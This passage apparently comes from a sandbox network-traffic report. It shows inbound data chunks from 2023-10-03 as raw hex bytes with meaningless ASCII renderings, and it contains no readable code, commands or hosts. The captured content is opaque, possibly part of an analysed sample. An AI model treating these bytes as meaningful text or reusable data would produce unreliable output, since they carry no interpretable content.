0e 2b 28 2b 18 d4 21 b7 37 9b b0 63 99 27 fc 58 60 dd dd f8 92 f2 87 f9 Data Ascii: REJ2<;J4gP w7U?`owjODg6C?lyxcdNT7R3YZ2MecGcBetojbA\|d}4JC#O*a35m2Mjc[}+aP)\nFOGyek1Hu(+(+!7c'X`
2023-10-03 20:34:59 UTC	785	IN	Data Raw: 02 37 cd 05 43 56 20 a8 5e e7 0a ac 58 a8 de c0 71 55 57 56 cc 08 f9 5c e4 89 86 ac 80 15 73 62 05 48 3e 97 15 a4 e2 ce 34 69 c8 10 8e 2e d3 f8 64 31 68 55 f0 3e 0f ee 33 40 32 ea 9b 08 be 2b b0 c5 2f 5c 81 54 e9 80 15 41 46 68 a6 23 0d ac c0 7c 03 a3 42 43 af a1 13 b7 98 73 02 54 74 d8 d0 03 a9 02 c2 d6 b9 0a 86 ba ea 47 1d 02 93 c9 38 e1 c6 2d 8d 33 e8 64 d0 61 ce b5 5e 3d 9e 26 34 ef 4f 18 40 b3 ff 83 02 02 f8 47 bc 06 13 80 89 03 ac 98 3f 54 2f e9 33 0a 81 62 f8 2d 1a 19 f1 c8 6c cb 15 58 81 58 02 0a 2b 71 a2 89 86 d2 37 43 2c 47 94 30 c4 08 54 80 79 00 2b 82 83 69 a8 ae 60 a3 ab 34 51 0f 03 33 18 0e 7a 8b 81 e8 ad 60 22 bf ac 05 33 9e 63 6f 1e 38 a6 c2 0a c2 b3 67 1a 7e 73 71 48 56 30 09 01 a3 21 94 16 8c 23 7c 7c b4 18 2f 61 e8 a0 79 08 2b d0 52 1c Data Ascii: 7CV ^XqUWV\sbH>4i.d1hU>3@2+/\TAFh#\|BCsTtG8-3da^=&4O@G?T/3b-lXX+q7C,G0Ty+i`4Q3z`"3co8g~sqHV0!#\|\|/ay+R
2023-10-03 20:34:59 UTC	801	IN	Data Raw: e2 00 20 eb 92 2d 9b c1 96 63 71 9f a1 26 36 cf af 81 f3 59 9e 33 78 fa b3 5c c0 bf 83 ba b3 a6 0a d3 8b 70 96 78 ed b7 b9 b1 9b 97 0d 64 31 a5 a1 9a e0 a3 5d 7f 4d c8 07 fe a2 dd 0f e7 fc 05 ee 8d 69 8f 2a 14 47 2c 6d b6 4f cb be 94 16 f5 c3 eb ca 73 ed 90 d9 28 86 be a9 a4 7e 87 c0 4d 8d 4b ee 28 d4 cc 2d d3 e5 53 b0 31 27 4f 4d 57 04 eb cd 1f c2 3d d6 1f b7 61 51 75 ca a6 9f 8d f7 0a e4 1d f4 ff 52 8d bc be bf 6d ee 4f 14 69 ea 17 cb 05 c5 78 25 f2 10 db c4 e6 d2 12 b0 fa 84 d1 2c ea 9f 81 d2 63 4f 88 49 b0 f0 15 46 aa 1c 94 40 a9 77 b2 8d 79 d5 0a 4b 2c 71 6f 01 16 34 d8 14 92 63 de 0a 91 60 7f 98 94 bc fa 03 ed 2d 99 61 21 fa 87 68 55 67 bb 92 64 b3 8c 12 6c 1e 09 80 b3 2b 3e f8 c5 b8 d6 89 08 67 63 13 03 75 1d ab 22 53 7e 77 b3 48 76 4d de 31 ba 15 Data Ascii: -cq&6Y3x\pxd1]Mi*G,mOs(~MK(-S1'OMW=aQuRmOix%,cOIF@wyK,qo4c`-a!hUgdl+>gcu"S~wHvM1
2023-10-03 20:34:59 UTC	817	IN	Data Raw: 5c fe 58 c0 95 f8 5f 00 60 4e 21 9c 6a b1 f4 8a 52 7d 3e 58 1b 77 4a be 09 e7 14 9f a6 b8 3d 1e 31 69 b9 bc c8 84 76 98 0c f0 51 30 5d c1 48 0c 1e 4b 1b 58 cb 14 81 d0 66 1e b8 8b 2d 74 41 6d 8b 55 a8 91 e9 dd f1 b7 e6 da bb a6 63 0a bb 9c 07 b2 d8 6e 3d 2e 7c 50 25 3d 75 2e e1 ae 33 95 83 9c d5 a3 97 4e 59 ee 00 64 ca 54 03 cb f7 64 2b 76 3d 33 ae 87 dd e2 c5 ea 55 35 46 0d 6f 54 8e 32 81 bb b1 f9 cf f0 49 53 58 39 ab d1 60 d9 8b a0 2c 1f 35 ed 6e 00 d5 cf 37 2c 99 8e 01 8b 7e 15 86 91 0b aa 12 7e 38 a9 e0 94 c9 ae c7 8a f5 da 80 3b 43 96 5d 77 8e ec ae 61 8c c9 d1 fb e0 5d 16 24 36 a1 93 81 73 53 6f 90 cc 0e 8f 82 f6 11 ae a8 ea 65 a5 36 2b fb 3e 38 b5 49 19 14 3e e1 54 eb 8f 28 1b da d5 dd 4f 95 03 c2 2e 67 00 94 0b 1d 3a a7 06 c7 60 9d c1 5c 5f e3 3e Data Ascii: \X_`N!jR}>XwJ=1ivQ0]HKXf-tAmUcn=.\|P%=u.3NYdTd+v=3U5FoT2ISX9`,5n7,~~8;C]wa]$6sSoe6+>8I>T(O.g:`\_>
2023-10-03 20:34:59 UTC	833	IN	Data Raw: f9 fa 45 28 9b 11 da 28 7a 5c a2 ec ab f8 0c 76 f9 f6 47 c2 73 32 bb d5 35 90 a8 2d 1f d8 f8 8a c1 99 1f 40 62 9e 48 5b e9 52 07 38 1c 89 65 21 03 3c b7 bb fe b1 b6 af 5c 7e 39 18 5f 85 26 44 bb 35 54 56 7c 90 ec df 28 42 0b 4a 17 ea e4 ae 0e 6a 75 83 ff 96 8c 1f 04 d4 61 bb 4e 1c 89 18 55 14 ac 95 52 63 53 6a 97 fd bc ff 44 4d 76 ff 43 3c e3 e1 83 1d bd 5d a5 3f 16 25 4f 67 39 7b 6e 9e 0a 77 8a b7 2c d4 0b e4 f3 9b 13 4e fc f5 9c df 40 d4 b1 dd 4e 50 8d a9 07 be f9 28 00 8d 0f 1e f4 b8 39 8d 98 75 a8 54 d9 33 08 b5 c2 98 62 3d 7c 55 b9 38 05 44 c6 21 77 f2 32 45 31 b5 ea 4d 2f 81 04 4a 16 13 81 93 e3 91 fa a7 7f d2 2d 47 8c 50 3a 4b 9f 24 27 44 c1 62 fb 03 14 d8 ca 85 31 46 1d 78 ac ce dd fd 39 63 8f cf 2d 2f 71 1b ca 6c 23 49 02 9f 83 4e 96 f2 a2 9d 55 Data Ascii: E((z\vGs25-@bH[R8e!<\~9_&D5TV\|(BJjuaNURcSjDMvC<]?%Og9{nw,N@NP(9uT3b=\|U8D!w2E1M/J-GP:K$'Db1Fx9c-/ql#INU
2023-10-03 20:34:59 UTC	849	IN	Data Raw: 73 63 e4 a9 e3 c1 60 36 2c 24 58 25 83 0f 01 86 0b 45 74 b6 c1 20 c7 02 71 54 3c 15 2c 72 4b 24 3b 3f c1 6e 52 10 70 79 a9 4b 90 36 f6 80 7f b4 03 d0 48 76 6c dc e0 00 f3 e9 ea 6f 7c 3f de c9 3a 97 2f b3 e3 e0 21 bc ce 3f c8 fb ca 4b 70 e8 0d 6a 40 09 50 16 8c 19 b7 23 b9 80 67 a1 3c 24 4f cd cf 24 02 3e 90 9e 26 01 d1 e0 29 70 7c d5 e0 05 88 fc cd bd 50 ee bc f0 2a 59 62 f5 de 06 08 35 9f b4 82 3e f4 dd 30 39 61 8f 61 34 80 0b 3c f0 34 25 b8 f1 87 26 49 df cc 17 20 4d c8 69 d6 8d e1 be ce 9e 0c 22 00 21 69 1b f0 c9 a1 30 85 46 11 cb 97 43 36 31 0a d9 c1 34 b9 9e b2 a7 40 66 8b 2f 48 be 80 f0 45 8a 15 dc 3a ec c7 3e ad 4f e6 3f 10 5a ee de f4 31 e1 0c 83 75 63 81 5d 10 a2 5e 0c 0c 83 ae 55 10 00 d5 90 e9 52 cd 41 93 29 f1 47 6a 40 4a f6 2d 08 07 5f a5 c2 Data Ascii: sc`6,$X%Et qT<,rK$;?nRpyK6Hvlo\|?:/!?Kpj@P#g<$O$>&)p\|P*Yb5>09aa4<4%&I Mi"!i0FC614@f/HE:>O?Z1uc]^URA)Gj@J-_
2023-10-03 20:34:59 UTC	865	IN	Data Raw: 84 72 3d 7f 90 05 6d ad bc 4f 41 b5 4f e7 f4 f4 03 52 43 4c 0c 96 98 2d 4e 2a cd 16 63 0d a4 40 30 75 86 d7 2b 31 2d e6 eb 42 d9 c4 a3 7a 5a 48 b3 06 13 69 25 0a 9b 17 c1 24 e3 27 ee a9 0f 03 3f c5 a4 c9 b5 3d c5 e5 49 19 98 8a 6f 5c 02 a0 85 8f 08 6a 6a 4f 0e 95 0b 4b 1b 5f 29 f6 c7 e0 70 fd 7e bb f6 5a 87 4e 3a 81 33 fe a7 49 e0 e7 35 20 b9 cf 90 6f d0 87 71 3d ab 2a 52 c2 3f 92 1d d9 3b d8 03 c2 b1 db b5 4c ed 36 8e 2b 66 15 43 69 ac 46 a1 13 63 7f 2b 0a d3 73 88 33 d6 2d fa 09 b4 b5 c6 4e b9 aa 89 4d 5d 71 02 ee b6 b1 49 4c ed 63 47 c7 b5 4b 79 a3 0d d7 be 50 52 52 63 4a 88 7d 2c bd 40 12 2a 54 87 6e ab d4 86 63 45 d9 a2 22 1e 9f 94 78 96 8c ae 01 47 36 53 1c 2c 14 6c e1 a0 89 96 f2 e0 67 48 3b 9b 46 13 ed 70 80 13 2b 0e e2 e4 18 83 7d 92 e4 4b ed 18 Data Ascii: r=mOAORCL-Nc@0u+1-BzZHi%$'?=Io\jjOK_)p~ZN:3I5 oq=R?;L6+fCiFc+s3-NM]qILcGKyPRRcJ},@*TncE"xG6S,lgH;Fp+}K
2023-10-03 20:34:59 UTC	881	IN	Data Raw: ae c3 ce c2 94 10 44 a6 5b 28 3d 95 7d 3d 70 f2 fa 96 d5 83 d8 e9 21 16 16 12 bd 11 0f 31 a3 2e 27 8a b5 4b af 1e 38 98 c4 5e e1 f1 fe 81 15 39 44 c6 70 89 24 dd 16 48 08 af b6 16 09 41 ae d2 22 ee b4 87 c2 b3 9a 42 22 ea 70 ae bd 6c 71 d9 16 40 c0 df f5 74 0c 0e 32 93 7b 39 d0 93 ec 85 ee aa 40 36 44 8a 75 b1 ce 0c b7 98 b8 e8 ab b9 dd ff f5 9e 74 26 c5 e9 31 ee 46 ae 18 ce e0 9f 3b 05 96 13 61 6e c9 e1 d4 1a 7f 31 0c b5 82 bd 5e 79 3d 2b 7b 52 42 2c 45 ba 3c 45 c9 de 2a c9 ba 96 57 ac 2b 82 58 ca ba fe a4 8e 47 ba 82 94 c9 b8 2b 40 1e 75 c1 d2 56 8b a0 ce fb d4 ea 74 c5 2c d6 be d7 0a de 4e 75 a7 cd 8e 38 c5 54 ab 32 51 40 41 57 1a af d6 6c 0f c7 31 61 55 5e fc ba 4f dc 13 d0 5e dd b0 2a 7e a4 d7 91 e6 b8 a0 0f db 4f 15 9e 65 1e a9 d7 de 0f aa 30 e6 1c Data Ascii: D[(=}=p!1.'K8^9Dp$HA"B"plq@t2{9@6Dut&1F;an1^y=+{RB,E<EW+XG+@uVt,Nu8T2Q@AWl1aU^O^~Oe0
2023-10-03 20:34:59 UTC	897	IN	Data Raw: 76 a6 d9 5a 02 36 9a 0e 43 68 0a d1 39 57 5e d8 22 67 39 e6 01 01 5a cd af 6b 60 5d c0 a5 bb 69 31 dd b8 5e 0e 84 d0 70 5e a5 4b 7c ed 77 12 c0 c7 c0 69 61 be bd 9f 2c 48 c3 2f 69 e1 df 15 ae e5 e0 f0 af 56 82 86 8b d0 43 18 5d 1f 4e ee 82 c6 98 94 df 69 78 b1 33 f2 11 2f 3d fe df 7d fd 5e eb 47 f5 af 4a 88 33 88 93 c3 fe de eb b6 83 3c d1 ef 5e ab dd be a3 5a 8c ac f3 f2 3c 13 0d 7c e3 07 f3 e8 7d e1 3c 49 44 74 32 22 b6 1f 93 c4 4f c7 7f 31 e7 1f 36 8b ae ee 5c 7d cf a5 6f e1 06 16 eb f9 f7 ed cf ac b4 ef 6c bf dc d1 f9 46 f2 6f 5f 0f df a7 e4 ad f1 7c 53 21 5e de 5f bf ea 41 69 39 f5 bd f5 fc 91 3a 78 56 b5 98 c2 fb 02 17 7e 79 a1 d9 9e e1 7c 42 84 7b 69 df d5 fa 48 3d 72 81 73 b3 ff f9 1e 2a 38 d1 34 f1 ad d5 cc 3c fd a9 27 a1 fe 96 89 e7 07 95 1d 8a Data Ascii: vZ6Ch9W^"g9Zk`]i1^p^K\|wia,H/iVC]Nix3/=}^GJ3<^Z<\|}<IDt2"O16\}olFo_\|S!^_Ai9:xV~y\|B{iH=rs*84<'
2023-10-03 20:34:59 UTC	913	IN	Data Raw: a8 83 4c 80 dd d2 a3 02 9d a8 21 4d 4b db 5a 38 3b e6 87 17 05 7b b7 bc 03 57 53 d5 70 30 c8 3e b8 24 60 3c 01 e9 44 f2 8d 3e 1d 84 ff 6f e3 f1 cd ed 42 53 e0 ee 77 98 9b 49 02 11 cf 4f f4 da b3 6f 12 0b be 8b bd a9 27 f9 ec 90 80 ea 84 e4 29 c3 3e 69 a1 6b b3 f3 83 8b 0f 42 27 04 5a 59 a0 d6 29 23 f6 03 cc 0f 50 70 98 14 e6 ce 83 10 6e 73 b4 73 50 0b be a2 bd da 1f 19 d3 41 a4 a2 3b 3a c3 74 98 10 30 36 5b be 6c d9 a4 77 d1 cd bb 78 37 62 c6 6f 48 f8 11 0d 1d e4 01 69 00 08 89 ef bb e5 a7 83 60 c2 c8 b2 6b 77 06 74 e8 72 1a bf 07 3c 3d a2 18 77 11 2d c5 a2 4a b5 83 50 01 8e 83 6c 35 8c 17 d6 d0 0d f0 a7 85 92 da 0c 72 0a 24 2f 7f f6 c3 c9 23 80 1a 23 9c 40 32 50 fa c1 64 72 06 97 0a 80 a1 d7 85 dd 35 23 db c0 5c bd 08 8f c9 7f 98 b8 03 01 5c a6 85 9b 22 Data Ascii: L!MKZ8;{WSp0>$`<D>oBSwIOo')>ikB'ZY)#PpnssPA;:t06[lwx7boHi`kwtr<=w-JPl5r$/##@2Pdr5#\\"
2023-10-03 20:34:59 UTC	929	IN	Data Raw: 77 89 05 25 04 c4 29 2e 00 68 85 4b 1a f0 1e 2e c4 d6 c0 3c 01 71 f7 e3 7a bd 0a 2e 7e 82 0f 74 d9 fa 35 e6 b7 83 ca 63 6c 17 e8 a1 82 f1 99 f8 be 9c f1 36 aa 8c db f6 93 2f 44 02 1d 81 63 ea 35 b3 7f a8 01 fc 8a 28 9d f2 7a d1 e7 9b 8a 2f 08 5c 41 0b 01 1c fe 36 1e 01 8e b9 30 65 40 35 76 15 f6 04 eb 1d 5c ba 53 65 1c d6 75 22 ad f9 b4 a5 f8 8f 8b 82 e6 2d 55 a0 c4 8c 5c 0f b8 5d 21 b7 6f 56 83 1a f1 89 4f 18 c1 2c 55 3c 21 24 ed 5a f9 7f 10 f3 b2 b8 8b c3 8c 13 8c 2d 74 5b 06 c8 ea ec 49 c9 3f 79 29 31 86 64 4f d1 ef d3 78 88 60 7b e2 68 84 f8 88 97 62 1c 4e df 65 b8 5b 9d a4 c1 18 d6 1c 18 ca 96 67 b8 28 16 3d 39 ce 6a 69 d1 d7 9c 44 0d 48 25 ec 82 bc 0a 79 2b 24 1c 83 1a 6b 40 8b ab b2 9c 11 21 8b 22 5b e7 89 97 b4 0c d4 4d 59 27 9d fe 9c 24 97 0e a7 Data Ascii: w%).hK.<qz.~t5cl6/Dc5(z/\A60e@5v\Seu"-U\]!oVO,U<!$Z-t[I?y)1dOx`{hbNe[g(=9jiDH%y+$k@!"[MY'$
2023-10-03 20:34:59 UTC	945	IN	Data Raw: b8 13 fa c2 96 d2 0b cd ac 85 e9 5e 5f 54 13 0e c3 b0 57 ef 1d 6b 2a 16 ed 2b 08 10 2f 9a ad ca 0a 22 4f 98 f6 0c 2f b1 96 59 c1 86 78 6e 7d 71 68 5a 0c d7 b8 4f 14 54 73 ab 54 0a c3 c0 a6 5e 27 0e d3 6a 67 cd 3d e3 74 88 cb a9 7b f9 fe 7e a1 4d d1 f8 a1 c2 43 b7 d9 32 59 7e 03 19 93 f5 ab f1 ce 28 49 48 7f b3 c2 5f b8 75 2c e5 13 3e 35 e2 b8 ca aa c2 3c 34 17 7a a6 25 61 12 6b 18 8d f8 fb 78 d7 a5 59 25 c9 3b ac 2f d0 51 79 77 cd 5d ab 54 11 38 df 1c 15 d2 a0 ef 40 82 07 84 ac 23 4f 83 77 63 71 83 72 b3 cc 0c 9c 39 8b 06 44 22 f6 8b 39 f4 5b 7e a7 c7 cd 76 9b 07 84 c8 ba 99 52 21 b6 ff 3c ce 5f 3c cc 86 b6 13 19 f2 89 ab 31 34 7e 66 05 6b 2d 85 f1 31 69 19 de 54 a3 8c 42 c3 b3 7e 1e 0a 89 dc fa 86 d0 bd bd 1d 64 f3 af 9d 61 12 83 9d 14 00 13 99 fa 87 6d Data Ascii: ^_TWk*+/"O/Yxn}qhZOTsT^'jg=t{~MC2Y~(IH_u,>5<4z%akxY%;/Qyw]T8@#Owcqr9D"9[~vR!<_<14~fk-1iTB~dam
2023-10-03 20:34:59 UTC	961	IN	Data Raw: b0 21 12 33 9e 90 ea 31 d7 2c 19 47 ef 3c 33 06 a7 c8 4e ea e6 10 1f d5 3f 17 46 a8 f7 e3 1b 49 3b 64 36 a4 d3 14 80 d4 26 62 06 43 5f 26 0d ab b0 9d 5b cb 59 f2 f7 99 59 2d d0 d4 0d 3c 0f 1a 08 39 ba 4b 67 29 15 65 61 4b d7 97 13 df 88 6d 97 57 0d 83 74 6a 91 68 d3 0c c9 45 44 82 8c b7 da 73 70 bc 2f be 5b 9a 34 85 7d de eb 83 80 d4 a1 0a 0d fb 64 8b 01 7a 1d 54 55 3f 43 0b 53 84 20 07 57 9e 2e 38 e6 a1 17 73 0e 22 e8 6c fe f3 45 51 fb 6f 67 fb fe 02 65 c5 62 d4 73 80 f9 9d 00 07 19 d9 a8 33 47 5b 8c 95 47 3f 0d 48 d1 3c 88 26 50 ee 31 52 b0 ba 2a 70 db c0 2a d0 9e c4 f3 67 f0 9e 0e 32 79 49 56 75 3d 93 80 ea d0 c6 50 3d 21 fb a0 f0 f5 a7 45 3c a0 61 7d 04 69 a2 9f a4 09 d4 3b 62 8d da 93 82 1e 03 16 d3 62 56 cf 40 51 80 74 fc 3d e1 b2 4f 84 dc 65 da c5 Data Ascii: !31,G<3N?FI;d6&bC_&[YY-<9Kg)eaKmWtjhEDsp/[4}dzTU?CS W.8s"lEQogebs3G[G?H<&P1Rpg2yIVu=P=!E<a}i;bbV@Qt=Oe
2023-10-03 20:34:59 UTC	977	IN	Data Raw: 98 af fb b4 bc 12 66 ef 30 5f 35 47 cd ac b8 ee 77 03 70 cf 1f 2e ad f4 fd 35 0c be 63 54 d7 48 ed b9 6a 82 ac 77 73 43 8b 6c 36 5f 9a 3e 5e 8b 2e 30 fa 99 6b 03 8d be 23 bd 85 5d 8d 39 6f 59 99 a6 03 e2 9b 2f 64 d9 fa ca c5 bb 40 b5 c6 f4 df f9 9f 33 50 51 c1 6f 97 18 92 97 ef 4d f1 52 e6 c2 f1 33 8f ea f6 77 62 26 a7 99 22 45 11 44 06 8a ae 82 56 c8 7c 85 a0 f1 74 bf 5a 3c 3e 70 57 61 c4 88 11 5d c9 5a 3c 74 ec 92 07 a9 ba fa 2c 9b 53 3c a0 28 aa 65 07 a0 a1 f1 3c 70 e6 63 c4 45 e6 e2 08 21 c4 9c 19 8f cf d4 d6 80 fe 57 f2 0c 65 68 f2 0f a6 ac ce 7c ee 2f 7d 36 1f ad 8f ba 7f 45 73 7d ac c9 14 ce 18 45 96 64 fe 7e 57 42 b8 d8 31 8f 4f 58 1c 99 19 f8 cc 4e f8 8e e9 cc 27 c4 76 04 8b a3 c4 63 a8 59 e8 a4 7f 05 4b 58 0c ce 89 c7 e7 2c 8e 10 42 bb 9e 38 ba Data Ascii: f0_5Gwp.5cTHjwsCl6_>^.0k#]9oY/d@3PQoMR3wb&"EDV\|tZ<>pWa]Z<t,S<(e<pcE!Weh\|/}6Es}Ed~WB1OXN'vcYKX,B8
2023-10-03 20:34:59 UTC	993	IN	Data Raw: 62 39 24 8e 0c e7 e0 aa 23 6c 1a d1 f3 e2 97 18 59 33 d8 4a 4f f3 03 8b 8b 11 b4 50 f3 1c ea 63 f6 9b 26 25 7c 3a ae 3e 7a 35 d6 16 79 32 5f 0d c1 93 41 ca f9 c2 c9 86 74 c9 82 18 b0 3b 44 de 63 c0 1d 42 5b 7a c3 a0 76 bb 5f 60 bb 1a 47 02 f0 78 4e 11 56 fb be a3 83 c6 4a b8 1b 73 ae 0d 94 c2 b0 cd 47 76 90 11 a3 20 39 3e ed 2e 54 9a c0 f4 3d 68 5d 3a f8 97 9d e4 38 8d f8 ca 99 b7 7b 71 a9 dc e9 00 be 91 c1 e8 d8 f7 e6 ce f9 aa 1a cd 5f 99 b9 bb 5f e9 84 fb a9 ab 9c f3 30 ff b8 04 fe 59 e9 be 5c 22 df 95 04 ba 39 03 d7 ca 38 cd 9d 08 d0 48 cb d4 bc 11 b8 83 3b 32 6e 09 8c 8f 36 b2 91 91 7b 4b 00 b6 52 4c b6 0c a4 3d d7 d4 21 fd 40 69 8a 93 ff 38 29 9f f2 60 05 93 48 6c 01 49 5a 44 cf ff 17 c3 cc a1 23 d6 4f 88 68 e1 bc 34 7e 29 9c c1 94 6c 9d 9e 12 56 35 Data Ascii: b9$#lY3JOPc&%\|:>z5y2_At;DcB[zv_`GxNVJsGv 9>.T=h]:8{q__0Y\"98H;2n6{KRL=!@i8)`HlIZD#Oh4~)lV5
2023-10-03 20:34:59 UTC	1009	IN	Data Raw: 44 79 4d ea 1b 57 54 4c c5 5a 84 b9 54 fb 6a bf 35 2c ba b5 02 1f 8a e6 12 98 75 fe 95 40 79 9a 95 a3 70 69 c8 fd 4c 79 e8 eb 55 b3 30 3d 4e f6 65 ef a1 13 66 73 38 4a 70 c1 25 60 e4 19 1d bc c6 0b b5 8a 54 b8 a9 9d 70 1e 24 a2 6a 59 a7 3d fd 35 dd d8 7b dc 20 4b a0 c0 44 44 47 38 73 03 2d 5c b6 1c 2b 84 53 41 30 fb bb 5b 3e e1 78 3b a3 9a ed d0 c4 a2 4b 0b 69 15 51 7b 9f d8 ed 97 e2 3c 7a b9 4a 1c 76 e4 c6 51 5e f4 dd 23 08 62 7b aa 25 e1 56 89 e3 36 81 f9 21 a9 49 a0 a4 d4 a4 d8 e4 e8 7d 1a 95 db 0a 02 1c 06 89 45 6c d2 51 9e 65 e9 77 ea 5f f3 99 fa 50 dc d0 37 5e 2f 00 20 da db 85 62 86 dd 8f 15 44 64 cc 26 90 0e 1d 4a 1f ca 0f fb 24 dd 4c 9a d5 69 5d 74 92 44 96 72 98 d5 cc 22 35 0e 68 07 d9 dd 53 36 35 d4 41 46 82 86 b9 8a da 62 44 70 cf 9b fc 8e ff Data Ascii: DyMWTLZTj5,u@ypiLyU0=Nefs8Jp%`Tp$jY=5{ KDDG8s-\+SA0[>x;KiQ{<zJvQ^#b{%V6!I}ElQew_P7^/ bDd&J$Li]tDr"5hS65AFbDp
2023-10-03 20:34:59 UTC	1025	IN	Data Raw: 82 e0 3c 1b df b9 0a b6 ee 45 ed 93 fd 76 31 ac 7d c7 62 23 90 be d1 aa 1c 14 3e 5f 48 76 90 4b e6 5c ec ed 1e cb 6d 4f c8 77 d8 dd ed df 30 24 e6 76 54 6b 2c c6 c4 0c 5c 8a cb aa eb a6 72 c8 ab 4f 06 8b ed 6e 8b 7c 42 bf 9b 71 e2 59 ef 86 89 49 d2 f8 eb f9 67 bf 75 cc 5f 27 6f 34 6b 2e cd c3 c3 6f ab b9 75 05 b5 d5 18 b8 e6 f7 5e 43 d9 3f 1b 53 ef dd fb ef e0 77 5e 91 77 8f 4f 81 f1 96 88 be d6 55 26 0d 47 b8 0f f4 f5 80 e0 f8 d7 a4 0f 03 51 db a0 37 1b 31 14 cb 99 af e2 ba 05 8e 02 a7 fd b1 2c 86 6d 3d 5d f1 65 d9 04 0b 7f d4 e1 00 72 5b 3b fa e2 34 b4 60 7c 3c 38 e7 05 97 da 0f e5 08 58 2d 3b 5c bc 12 14 29 fb e3 f9 10 70 3d a5 f0 fb cf 3c 9a 9a 5f ac 9e ac ae 89 e8 e3 dc aa e1 82 c5 35 3b 4f 06 67 79 ae 43 9c be f3 c4 68 03 d7 c0 52 30 d6 43 17 01 47 Data Ascii: <Ev1}b#>_HvK\mOw0$vTk,\rOn\|BqYIgu_'o4k.ou^C?Sw^wOU&GQ71,m=]er[;4`\|<8X-;\)p=<_5;OgyChR0CG
2023-10-03 20:34:59 UTC	1041	IN	Data Raw: 19 a3 24 29 fa 4a 0b ff 19 54 0b 72 51 f7 b0 00 17 7a 8a ce f5 86 1f 6f ba d0 47 4e 46 3a 0c 2b 64 b6 13 3b b6 87 7e a3 bf 8c 40 c9 f6 b1 6e 48 f7 d0 a5 66 55 ab f1 22 1c 94 23 06 d3 63 74 3f 77 f2 b2 02 37 fc 46 df 8b a7 97 e3 08 0b 65 fb 6c 53 94 77 a1 b7 5f 79 76 3a d0 83 a7 ce f3 4c a8 a2 f3 f2 df cd aa 16 3a 51 46 94 37 99 17 7d ea 3a d1 ef 74 f4 bf a3 0b ca 0a 1a 5e 82 8e 5e 91 95 3a a2 d5 4c c1 9a d9 0c 89 e8 c0 86 2d fb 9b 59 ad cc 97 87 25 95 4e 06 cd 75 cc 9b 20 e6 ad 8f 1f ec 9e 4c 76 e7 71 39 be d3 25 2f b4 11 51 ad 5a 89 f6 5d ec ba 90 ba 0b 6a d6 88 bf 72 04 52 4e 2d 11 37 64 5e bd 71 be 5b b7 65 d1 0a 05 6f bf d9 0c c5 4a 67 86 94 9d cb 39 34 39 92 d8 e7 68 a8 00 3c 33 87 9b 33 ef 15 d1 55 8e ad fb 3e f0 58 1d 17 45 d6 74 b9 4a ca eb 53 d2 Data Ascii: $)JTrQzoGNF:+d;~@nHfU"#ct?w7FelSw_yv:L:QF7}:t^^:L-Y%Nu Lvq9%/QZ]jrRN-7d^q[eoJg949h<33U>XEtJS
2023-10-03 20:34:59 UTC	1057	IN	Data Raw: f9 72 7a 4f ec 3e ee fb 60 c8 01 b1 49 1c 7f f1 6f e7 0d d9 b6 2d 59 02 fa b4 1d 53 f9 fe 95 5e 8a 7e 74 7f 3c 67 d0 be bd fb 4b 03 8f 93 57 8f 57 cd af 53 0f ff 13 48 64 db b6 0f f0 a5 f9 22 b5 03 da 4e 16 0d e8 7f f2 ee 71 1f f9 2c 6d 4c 12 72 db d8 03 2a e6 e2 92 8f 87 21 d7 1b 95 06 f3 5c 5b 3e 7e 73 fe 07 25 e8 99 e8 c1 5d 4b cf 93 f5 b9 93 fe 00 78 a8 b7 69 bd 2b 10 ca 17 7c f1 ba 2f ff fc ba 6b 40 04 f6 d3 e4 cf 6b 36 8a 2a 2f 6f ff cc 3f 36 a7 e4 5e f8 a0 5e 17 9b be fc cd d7 cf 43 21 ce fc c7 f8 71 b7 fd 1e d0 cc e7 56 fb f7 7f a9 3f 7e 2c ed 57 b3 29 bd 34 f7 26 27 c8 b7 5d 52 da 71 4f 7a fa ea e6 bf 37 97 fc e0 4d 6f 4f 3d 35 f0 8a 43 78 de 84 8b 96 fc 0f a8 6d 11 99 83 d2 99 84 5e 95 af c3 f3 05 5f eb fd 11 26 0a 76 25 10 5e 6f 7b f3 97 fd ef Data Ascii: rzO>`Io-YS^~t<gKWWSHd"Nq,mLr!\[>~s%]Kxi+\|/k@k6/o?6^^C!qV?~,W)4&']RqOz7MoO=5Cxm^_&v%^o{
2023-10-03 20:34:59 UTC	1073	IN	Data Raw: 98 12 8b a7 43 68 41 a1 11 3a 87 dd e7 9d e2 81 12 d3 78 b3 a1 c4 9b a1 81 6b c2 6f 11 47 ac 23 b2 3f c6 8e 53 8b 31 87 c8 26 16 2c 88 53 84 c4 a8 a1 62 90 9e f1 d1 d3 a4 85 01 93 5a 6f 0b 56 12 04 0d 42 99 91 e3 c2 82 12 96 e5 9b 5d dd 18 31 6c 7e 34 f3 90 69 16 1a 43 34 56 d4 40 53 20 58 11 68 f1 0a 6e 40 b2 47 65 15 07 e9 a1 16 46 d0 00 98 de c4 6b 70 b0 c3 1e b5 58 49 7e 65 c1 23 c1 98 17 4d 90 96 28 d0 09 b0 5e 74 b2 7e 39 e0 49 13 d1 0b b0 2c f2 64 cc 02 2d 4d a7 06 88 84 b9 3f 97 74 46 53 4f 11 3c 65 91 84 f8 ca 30 d0 08 82 01 2e b6 d3 06 0d a0 1d 71 c1 85 a2 47 f8 86 06 cc 0a 2c 0e 20 49 78 1a d1 3e 10 34 24 34 f4 d2 36 ad 0d a6 60 49 28 fe 03 b1 3d 24 49 5d 38 4e c2 82 8b 12 c9 33 17 47 43 94 79 87 6a 0b 6e 13 f2 e2 10 e9 4f ce 40 62 83 60 f2 20 Data Ascii: ChA:xkoG#?S1&,SbZoVB]1l~4iC4V@S Xhn@GeFkpXI~e#M(^t~9I,d-M?tFSO<e0.qG, Ix>4$46`I(=$I]8N3GCyjnO@b`
2023-10-03 20:34:59 UTC	1089	IN	Data Raw: 7b 0e 9e 44 c8 c3 d2 a6 88 28 20 0f 4e fc 82 8d 05 93 8e 85 33 b0 0b 2e 5c c7 20 f9 2e 69 d9 ff ce 47 da 2f 33 4a 54 15 10 14 87 28 13 c6 fd ff 65 47 dd f3 c7 6a c3 f7 07 f2 b0 54 cc e7 31 15 63 42 b3 7b 48 6d 0e d8 a4 a9 a1 2f 81 67 3e 5e 8d bb dc c6 05 01 7a ba b9 78 ae 39 0e 9c 93 0f ea 9b b6 27 e5 6d 70 27 21 96 be 71 21 f7 4a af 9b 09 9d 72 0a e9 61 bb 1a f6 55 5e f6 17 38 4b a4 59 a8 fb 9a b1 3c 5a 1f 99 6f 6e 3c 90 bb 24 73 c0 6b a5 fd 69 77 97 70 7c 7f 0f d1 6d 42 e4 ba e9 72 03 47 0e 99 01 77 79 1e 15 9c 19 68 d4 89 33 dd 24 85 14 14 0a 68 7f 